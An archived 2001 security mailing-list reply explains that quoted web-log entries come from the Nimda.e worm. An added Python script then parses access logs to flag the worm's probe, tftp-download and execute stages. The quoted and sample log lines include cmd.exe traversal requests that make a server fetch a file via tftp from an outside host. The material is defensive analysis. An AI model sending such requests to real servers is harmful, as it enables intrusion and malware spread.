Re: New Worm Variant?

From: Ryan Russell (ryanat_private)
Date: Tue Oct 30 2001 - 09:08:42 PST


    On Mon, 29 Oct 2001, Aj Effin Reznor wrote:
    
    > [29/Oct/2001:17:09:02 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir
    > HTTP/1.0" 200 394 "-" "-"
    > [29/Oct/2001:17:09:11 -0800] "GET
    > /c/winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll
    > HTTP/1.0" 200 449 "-" "-"
    > [29/Oct/2001:17:08:53 -0800] "GET /MSADC/httpodbc.dll HTTP/1.0" 404 330
    > "-" "-"
    
    As someone pointed out, this is Nimda.e.  What's going on here is that
    since your web server is responding with a 200 to the exploit attempt, it
    thinks it has found a vulnerable victim.  So it issues the tftp command to
    try and make your web server download a copy.  Then it sends a command to
    try to execute the file it thinks it has caused you to download.
    
    					Ryan
    
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see: http://aris.securityfocus.com
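The three-step sequence Ryan describes (cmd.exe probe, tftp fetch if the probe gets a 200, then a request for the dropped httpodbc.dll) is easy to pick out of a web log. The following is an added detection example, not code from the original post or from the ARIS service: it parses combined-format access log lines, classifies each request by worm stage, decodes the tftp command to recover the server the worm tried to fetch from, and groups the result per client. The log lines inside the block are constructed for the example and use RFC 5737 documentation addresses; the client IP, the 192.0.2.10 tftp host and the fourth httpodbc.dll request are assumptions, not data from the thread.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample of a combined-format access log (not from the original
# post). It mirrors the Nimda probe sequence quoted above, with RFC 5737
# documentation addresses standing in for real hosts, plus one benign request.
SAMPLE_LOG = """\
198.51.100.7 - - [29/Oct/2001:17:08:53 -0800] "GET /MSADC/httpodbc.dll HTTP/1.0" 404 330 "-" "-"
198.51.100.7 - - [29/Oct/2001:17:09:02 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 394 "-" "-"
198.51.100.7 - - [29/Oct/2001:17:09:11 -0800] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20192.0.2.10%20GET%20cool.dll%20c:\\httpodbc.dll HTTP/1.0" 200 449 "-" "-"
198.51.100.7 - - [29/Oct/2001:17:09:20 -0800] "GET /scripts/httpodbc.dll HTTP/1.0" 404 330 "-" "-"
203.0.113.5 - - [29/Oct/2001:17:10:00 -0800] "GET /index.html HTTP/1.0" 200 1024 "-" "-"
"""

# Combined/common log format: client, identd, user, [timestamp], "request", status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# The tftp command the worm passes to cmd.exe: tftp -i <host> GET <file> <dest>
TFTP_RE = re.compile(r'\btftp\s+-i\s+(\S+)\s+GET\s+(\S+)\s+(\S+)', re.IGNORECASE)


def classify(target):
    """Map one request target to a worm stage: 'probe', 'fetch', 'execute' or None.

    Returns (stage, tftp_host); tftp_host is only set for the 'fetch' stage.
    """
    path, _, query = target.partition('?')
    decoded = unquote_plus(query)          # turns %20 and '+' back into spaces
    if path.lower().endswith('/cmd.exe'):
        m = TFTP_RE.search(decoded)
        if m:
            return 'fetch', m.group(1)
        return 'probe', None
    if path.lower().endswith('/httpodbc.dll'):
        return 'execute', None
    return None, None


def analyze(log_text):
    """Group Nimda-style requests per client IP.

    For each client returns the ordered list of stages seen, whether the
    cmd.exe probe was answered with 200 (which is what makes the worm
    continue), and the tftp host named in the fetch command, if any.
    """
    findings = {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        stage, tftp_host = classify(m['target'])
        if stage is None:
            continue
        f = findings.setdefault(
            m['ip'], {'stages': [], 'probe_got_200': False, 'tftp_host': None})
        f['stages'].append(stage)
        if stage == 'probe' and m['status'] == '200':
            f['probe_got_200'] = True
        if tftp_host:
            f['tftp_host'] = tftp_host
    return findings


def verdict(finding):
    """One-line triage note for a client's finding."""
    if finding['probe_got_200'] and 'fetch' in finding['stages']:
        return ('cmd.exe probe got 200, worm escalated to tftp fetch from %s; '
                'confirm the path never reaches a real cmd.exe' % finding['tftp_host'])
    if 'fetch' in finding['stages']:
        return 'tftp fetch attempted from %s' % finding['tftp_host']
    return 'probe only'


if __name__ == '__main__':
    for ip, f in analyze(SAMPLE_LOG).items():
        print(ip, f['stages'], '->', verdict(f))
```

The status code is the interesting field: on a server that answers every path with 200 (a catch-all handler, a redirect-to-index setup, a non-IIS box), the worm cannot tell the difference from a real hit, so you will see the full fetch-and-execute sequence in the log even though nothing was downloaded. Confirming that the httpodbc.dll requests returned 404, as in the quoted log, is the quick way to show the host is only being scanned rather than compromised.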
    


